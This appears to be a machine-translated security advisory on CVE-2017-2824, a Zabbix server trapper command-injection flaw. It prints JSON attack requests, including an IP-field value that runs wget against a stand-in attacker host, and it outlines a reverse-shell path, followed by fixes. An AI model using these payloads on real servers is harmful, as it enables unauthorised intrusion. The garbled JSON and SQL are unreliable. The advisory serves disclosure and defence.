cve-2017-2824 of Zabbix explosion high risk loophole

Guide

Zabbix can monitor various network parameters, ensure the safe operation of the server system, and provide flexible notification mechanism for the system administrator to quickly locate/solve the various problems.

about Zabbix

Zabbix is an enterprise-class open source solution based on the Web interface that provides distributed system monitoring and network monitoring capabilities.

Zabbix can monitor various network parameters, ensure the safe operation of the server system, and provide flexible notification mechanism for the system administrator to quickly locate/solve the various problems. Vulnerability Details

Cve-2017-2824:zabbix Server Active Proxy Trapper Remote Code Execution vulnerability

There is a code execution vulnerability in the Trapper Command feature in Zabbix 2.4.x, where a specific packet can cause command injection and remote code execution, allowing an attacker to initiate a request from a ZABBIX proxy to trigger a vulnerability.

Impact Version

Zabbix 2.4.7–2.4.8R1

Vulnerability Description

The vulnerability is located in the "Trapper" code section of Zabbix, whose primary function is to allow proxy and server to communicate with the network Service (TCP port 10051) Zabbix Server provides a set of API calls for Zabbix Proxy. The two will be talking about "discovery data" and "Request Command". Sample data for these requests are as follows:

' {request ': ' Command ', ' Scriptid ': 1, ' HostID ': 10001} '
{' request ': ' Discovery Data ', ' Host ': ' Zabbix-proxy.com ',   "Clock": "
Data": [{"Clock": Ten, "Drule": 1, "Dcheck2," type ": 0," ip:10.0.0.1, "DNS": "Zabbix-agent.com",    Port ": 10050," key ":" Test "," status ": 0," value ":" Test_value "}]}

It should be noted that the request command invokes the script in the Zabbix database without any authentication. Another key aspect of this vulnerability is that by default, Zabbix 2.4.X populates the MySQL database with 3 scripts from the following table:

The problem is that when the script is invoked, {HOST. The CONN} field is actually replaced by the host's IP address. Replace {HOST. The value of CONN} is in the Zabbixinterface table and is then saved as an "IP" field of type varchar (64). Therefore, if an attacker can use command injection to create an interface as an IP address, and run the {HOST by "command" request. CONN} script, a command injection will occur and a reverse shell can be obtained.

The challenge is to effectively insert values into the Zabbixhost table. By default, an unauthenticated attacker would not be able to do this, requiring a secondary configuration of the system administrator, especially with regard to the Zabbix automatic discovery feature.

The Zabbix automatic discovery and Autoenrollment feature allows Zabbix server configuration based on Zabbix server data provided by Zabbix Proxy. More specifically, if the host provides certain features to Zabbix proxy based on the configuration of the server, some actions may be taken, one of which will cause the newly discovered host to be added to some Zabbix database tables. In this case, the host is inserted into the "host" table, and a portal is created into the Zabbixinterface table, and the IP address provided by the host is inserted into the IP column without any validation of the IP address.

Therefore, you can insert command injection into the database by sending a discovery data request to the server using the appropriate host:

Write_script_cmd= ' {
"request": "Discoverydata",
"host": "Zabbix-proxy.domain.fake",
"clock" : 148535399,
"data": [{
"clock": 1485353070,
"Drule": ",
Dcheck": 174,
"type": 0,
"IP": "; wget-o/tmp/shttp://attacker-ip/s;# ",
" DNS ":" Host28.domain.fake ",
" port ": 10050,
" key ":" Sectest ",
"status": 0,
"value": "lnx< (^_^) >host"
}]} '

Because of the size limit of the IP field of the Zabbixinterface table, the second host is inserted into the table of another IP address.

Run_cmd = ' {'
request ': ' Command ',
' Scriptid ': 1, '
hostid ': 14666
} '

After these two hosts are added, there is still a problem, that is, not knowing the command request of the HostID, but this is easy to solve. Violent requests are entered into the database because different command requests return different responses, determine if the host exists, and once the host is identified, it can be invoked directly and the reverse shell can be obtained. Repair Scheme

1. Website repair version released in time after the upgrade, the current official feedback will be repaired in the following version: 2.0.21rc1, 2.2.18rc1, 3.0.9rc1, 3.2.5rc1, 3.4.0ALPHA1 (trunk)

2. Mitigation measures: Delete the default script entries in the Zabbix database directly manipulate the database delete sql:

Use Zabbix;
Delete * from scripts;

Delete using the graphical interface (Administration->scripts->checkmarks->delete Selected).

This article is reproduced from: http://www.linuxprobe.com/zabbix-bug-cve.html